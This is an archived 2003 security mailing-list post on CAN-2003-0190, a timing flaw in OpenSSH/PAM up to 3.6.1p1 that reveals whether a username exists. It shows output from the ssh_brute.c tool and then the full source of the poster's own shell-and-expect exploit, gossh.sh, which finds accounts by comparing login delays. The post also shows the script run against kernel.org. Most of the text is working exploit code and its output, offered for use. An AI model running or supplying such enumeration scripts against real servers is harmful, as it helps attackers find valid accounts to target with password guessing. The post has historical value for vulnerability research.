lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
From: nc at stormvault.net (Nicolas Couture)
Subject: CAN-2003-0190 - OpenSSH <= 3.6.1p1

After my 

--- experience ---
bash-2.05a$ ./a.out

 SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
 Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved

 Usage: ./a.out <protocol version> <user file> <host>

bash-2.05a$ echo root > file
bash-2.05a$ ./a.out 2 file 0

 SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
 Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved

 Testing an illegal user        : sh: ./ssh: No such file or directory
sh: ./ssh: No such file or directory
sh: ./ssh: No such file or directory
127 second(s)

 Testing login root             : sh: ./ssh: No such file or directory
ILLEGAL [127 second(s)]

bash-2.05a$ cp `which ssh` .
bash-2.05a$ ./a.out 2 file 0

 SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
 Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved

 Testing an illegal user        : not_val_user@0's password: # here I
had to type enter manually (????)
Permission denied, please try again. 
not_val_user@0's password: # and so here as well as all other password
prompts
Permission denied, please try again.
not_val_user@0's password:
Permission denied (publickey,password,keyboard-interactive).
not_val_user@0's password:
Permission denied, please try again.
not_val_user@0's password:
Permission denied, please try again.
not_val_user@0's password:
Permission denied (publickey,password,keyboard-interactive).
not_val_user@0's password:
Permission denied, please try again.
not_val_user@0's password:
Permission denied, please try again.
not_val_user@0's password:
Permission denied (publickey,password,keyboard-interactive).
255 second(s)

 Testing login root             : root@0's password:
Permission denied, please try again.
root@0's password:
Permission denied, please try again.
root@0's password:
Permission denied (publickey,password,keyboard-interactive).
ILLEGAL [255 second(s)]

bash-2.05a$
--- experience ---

with ssh_brute.c from mediaservice.net who released, lately, an advisory
for OpenSSH <= 3.6.1p1 that became CAN-2003-0190
(http://lab.mediaservice.net/advisory/2003-01-openssh.txt) I decided to
write my own working exploit:

--- gossh.sh ---
#!/bin/sh
# OpenSSH <= 3.6.p1 - User Identification.
# Nicolas Couture - nc@...rmvault.net
#
# Description:
#	-Tells you wether or not a user exist on
#	  a distant server running OpenSSH.
# 
# Usage:
#	-You NEED to have the host's public key
#	  before executing this script. 
#


#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# Fact Sheet:					#
#	  o It is really accurate against	#
#	    redhat boxes.			#
# 	  o Linux boxes running grsecurity	#
#	    has 10 seconds delay on both	#
#	    valid AND invalid user login	#
#	    attempts.				#
#	  o *BSD boxes are not vulnerables and  #
#	     always has 10 seconds delay like   #
#	     Linux-Grsec + network protection   #
#						#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# History:				    #
#	 Thu May  1 15:41:18 EDT 2003 	    #
#	  ; Script started.		    #
#	 Thu May  1 16:42:30 EDT 2003	    #
#	  ; Script is functional.	    #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

# Let the user know how we work.
usage(){
 echo "$0 <user> <host>"
 exit 1
}

# Verify the arguments.
[ $# != 2 ] && usage

# Variables.
USER="$1"
HOST="$2"

#=-=-=-=-=-=-=-=-=-=-=-=-=#
# Expect script functions #
#=-=-=-=-=-=-=-=-=-=-=-=-=#

# Expect script for password.
expasswd() {
cat << EOF > expasswd 
spawn $SSHCMD
expect password:
send '\r'
interact
EOF
}

# Expect script for error.
experror() {
cat << EOF > experror
spawn expect -f expasswd
expect again.
exit 1593
interact
EOF
}

#=-=-=-=-=-=-=-=-=-=#
# -Fake user timing #
#=-=-=-=-=-=-=-=-=-=#

# OpenSSH client command for inexisting user.
export SSHCMD="ssh nicolas_couture@...ST"

# Build new expect script.
expasswd
experror

# Timing.
FDATE0=`date '+%s'`
echo "[-] Calculating fake user timeout..."
expect -f experror 1> /dev/null 2> /dev/null
FDATE1=`date '+%s'`

# Fake user timeout.
FUTO=`echo $FDATE1 - $FDATE0 | bc`
echo "[+] Found $FUTO."

#=-=-=-=-=-=-=-=#
# -$USER timing #
#=-=-=-=-=-=-=-=#

# OpenSSH command.
export SSHCMD="ssh $USER@...ST"

# Build new expect scripts.
expasswd
experror

DATE0=`date '+%s'`
echo "[-] Calculating $USER timeout on $SERVER..."
expect -f experror 1> /dev/null 2> /dev/null
DATE1=`date '+%s'`

# $USER timeout.
END=`echo $DATE1 - $DATE0 | bc`
echo "[+] Found $END."

#=-=-=-=-=#
# -Result #
#=-=-=-=-=#

if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
 echo "This box is not vulnerable."
 exit 1
fi

# Use of our magic skills.
if [ "$FUTO" -lt "$END" ]; then
 echo "$USER exist on $HOST."
elif [ "$FUTO" -ge "$END" ]; then
 echo "$USER doesn't exist on $HOST."
else
 echo "Segmentation fault."
 exit 13
fi

# Remove tmp files.
rm -rf expasswd experror

# EOF
--- gossh.sh ---

Interesting things you can find with this script...

--- snip ---
bash-2.05a$ ./gossh.sh linux kernel.org
[-] Calculating fake user timeout...
[+] Found 1.
[-] Calculating linux timeout on kernel.org...
[+] Found 1.
linux doesn't exist on kernel.org.
bash-2.05a$ finger linux@...nel.org
The latest stable version of the Linux kernel is:           2.4.20
The latest prepatch for the stable Linux kernel tree is:    2.4.21-rc1
The latest beta version of the Linux kernel is:             2.5.68
The latest snapshot for the beta Linux kernel tree is:      2.5.68-bk11
The latest 2.2 version of the Linux kernel is:              2.2.25
The latest 2.0 version of the Linux kernel is:              2.0.39
The latest prepatch for the 2.0 Linux kernel tree is:       2.0.40-rc6
The latest -ac patch to the stable Linux kernels is:       
2.4.21-rc1-ac3
The latest -ac patch to the beta Linux kernels is:          2.5.67-ac2
The latest -dj patch to the beta Linux kernels is:          2.5.60-dj2
--- snip ---

This is a sign that the finger daemon has been hacked by some kernel.org
people :)


Links: 
	-http://lab.mediaservice.net/advisory/2003-01-openssh.txt
	-http://lab.mediaservice.net/code/ssh_brute.c

Powered by blists - more mailing lists